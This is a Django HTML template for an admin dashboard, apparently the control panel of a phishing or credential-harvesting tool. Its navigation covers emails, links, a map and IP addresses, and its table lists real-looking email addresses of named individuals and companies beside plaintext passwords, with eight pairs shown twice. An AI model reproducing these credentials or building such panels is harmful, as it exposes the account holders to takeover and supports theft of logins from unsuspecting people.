{% extends 'base.html'%}
{% load static %}

{% block js_and_css%}

   <meta charset="utf-8" />
   <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
   <link rel="apple-touch-icon" sizes="76x76" href="/static/assets/img/apple-icon.png">
   <link rel="icon" type="image/png" href="/static/assets/img/favicon.png">
   <script src="https://cdn.jsdelivr.net/npm/chart.js@3.5.1/dist/chart.min.js"></script>


   <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" rel="stylesheet" />
   <link href="{% static 'css/nucleo-icons.css' %}" rel="stylesheet" />
   <link href="{% static 'css/nucleo-svg.css' %}" rel="stylesheet" />
   
   <script src="{% static 'js/42d5adcbca.js' %}" crossorigin="anonymous"></script>
   <link href="{% static 'css/nucleo-svg.css' %}" rel="stylesheet" />
   <link id="pagestyle" href="{% static 'css/soft-ui-dashboard.css' %}" rel="stylesheet" />
{% endblock %}


{% block leftnav %}
   <div class="nav_list"> <a href="/admin" class="nav_link active"> <i class='bx bx-grid-alt nav_icon'></i> <span class="nav_name">Dashboard</span> </a> <a href="#" class="nav_link"> <i class='bx bx-user nav_icon'></i> <span class="nav_name">Emails</span> </a> <a href="/map" class="nav_link"><i class="bi bi-map" style="font-size: 1.2rem;"></i><span class="nav_name">map</span> </a> <a href=
   "/links" class="nav_link"> <i class="bi bi-link" style="font-size: 1.75rem;"></i><span class="nav_name">Links</span> </a> <a href="#" class="nav_link"> <i class='bx bx-folder nav_icon'></i> <span class="nav_name">ip address</span> </a> <a href="#" class="nav_link"> <i class='bx bx-bar-chart-alt-2 nav_icon'></i> <span class="nav_name">Stats</span> </a> 
{% endblock %}

{% block title%}
ip table
{% endblock%}


{% block content %}
<div class="container-fluid" >
<div class="row">
<table class="table table-striped table-hover" style="background-color:#d1feff" >
  <thead style="background-color:#570ac9;color:white;">
    <tr>
      <th scope="col" >#</th>
      <th scope="col">email</th>
      <th scope="col">password</th>
      

    </tr>
  </thead>
   <tbody>


   <th scope="row"></th>
   <td></td>
   <td></td>
   <td></td>
   </tr>
   


   <tr>
      <th scope="row">1</th>
      <td style="color:black">aaburahmah@gmail.com
      
</td>
      <td style="color:black">12345678

      
</td>
    </tr>
   <tr>
      <th scope="row">2</th>
      <td style="color:black">aadams@ludovici-orange.com
</td>
      <td style="color:black">iloveyou
</td>
    </tr>
   <tr>
      <th scope="row">3</th>
      <td style="color:black">AAGARGIULO@AOL.COM
</td>
      <td style="color:black">password
</td>
    </tr>
     <tr>
      <th scope="row">4</th>
      <td style="color:black">AAKSPE@DUCTSTOPSHERE.COM
</td>
      <td style="color:black">tequiero</td>
    </tr>
       <tr>
      <th scope="row">5</th>
      <td style="color:black">aaron.gonzalez@pwr.utc.com
</td>
      <td style="color:black">abc123</td>
    </tr>
       <tr>
      <th scope="row">6</th>
      <td style="color:black">aaron.r.epstein@gmail.com
</td>
      <td style="color:black">dragon</td>
    </tr>
    <tr>
      <th scope="row">7</th>
      <td style="color:black">waqar22153@yahoo.com
</td>
      <td style="color:black">12345678
</td>
    </tr>
      <tr>
      <th scope="row">8</th>
      <td style="color:black">waqar22153@yahoo.com
</td>
      <td style="color:black">monkey</td>
    </tr>
 <tr>
      <th scope="row">9</th>
      <td style="color:black">aaburahmah@gmail.com
      
</td>
      <td style="color:black">12345678

      
</td>
    </tr>
   <tr>
      <th scope="row">10</th>
      <td style="color:black">aadams@ludovici-orange.com
</td>
      <td style="color:black">iloveyou
</td>
    </tr>
   <tr>
      <th scope="row">11</th>
      <td style="color:black">AAGARGIULO@AOL.COM
</td>
      <td style="color:black">password
</td>
    </tr>
     <tr>
      <th scope="row">12</th>
      <td style="color:black">AAKSPE@DUCTSTOPSHERE.COM
</td>
      <td style="color:black">tequiero</td>
    </tr>
       <tr>
      <th scope="row">13</th>
      <td style="color:black">aaron.gonzalez@pwr.utc.com
</td>
      <td style="color:black">abc123</td>
    </tr>
       <tr>
      <th scope="row">14</th>
      <td style="color:black">aaron.r.epstein@gmail.com
</td>
      <td style="color:black">dragon</td>
    </tr>
    <tr>
      <th scope="row">15</th>
      <td style="color:black">waqar22153@yahoo.com
</td>
      <td style="color:black">12345678
</td>
    </tr>
      <tr>
      <th scope="row">16</th>
      <td style="color:black">waqar22153@yahoo.com
</td>
      <td style="color:black">monkey</td>
    </tr>
  
   </tbody>
</div>

</div>
{% endblock %}



